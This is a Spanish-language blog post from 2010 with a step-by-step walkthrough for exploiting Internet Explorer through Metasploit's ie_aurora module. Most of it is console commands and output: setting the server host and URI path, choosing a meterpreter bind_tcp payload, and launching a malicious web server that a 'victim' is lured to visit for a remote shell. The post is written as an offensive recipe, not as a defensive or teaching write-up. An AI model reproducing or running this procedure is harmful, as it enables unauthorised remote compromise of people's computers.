Últimas entradas »

viernes, 19 de febrero de 2010

[Metasploit] Exploit IE_Aurora 0-day

Bueno... peluciando por la internet encontré este bug en el IE que permite obtener shell remota :). Ya que me gustó lo explicaré a mi manera pero igual posteriormente pondré el link de donde encontré esta información.



Pasos:

1.- Descargar exploit AQUI

2.-
Guardarlo en cualquier carpeta(en este caso Windows/Browser/)

3.- Ejecutamos el MSF y seguimos los sigente comandos:





=[ metasploit v3.3.3-release [core:3.3 api:1.0]
+ -- --=[ 482 exploits - 220 auxiliary
+ -- --=[ 192 payloads - 22 encoders - 8 nops
=[ svn r7957 updated 58 days ago (2009.12.23)

Warning: This copy of the Metasploit Framework was last updated 58 days ago.
We recommend that you update the framework at least every other day.
For information on updating your copy of Metasploit, please see:
http://dev.metasploit.com/redmine/projects/framework/wiki/Updating

msf > use windows/browser/ie_aurora
msf exploit(ie_aurora) > show options

Module options:

Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3
URIPATH no The URI to use for this exploit (default is random)


Exploit target:

Id Name
-- ----
msf exploit(ie_aurora) > set srvhost 192.168.0.101
srvhost => 192.168.0.101
msf exploit(ie_aurora) > set uripath /
uripath => /
msf exploit(ie_aurora) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf exploit(ie_aurora) > exploit
[*] Exploit running as background job.
msf exploit(ie_aurora) >
[*] Using URL: http://192.168.0.101:8080/
[*] Started bind handler




Creo que para los que se manejan en esto está demas dar explicaciones sobre el funcionamiento del MSF así que me ahorro comentarios :).


4.- Luego la victima ingresa a http://192.168.0.101:8080 y WOW! estamos listos :)

Bueno... eso fue todo :), ahora les dejo el link de donde obtube esta información:

Web con la información: elhacker.net

No hay comentarios:

Publicar un comentario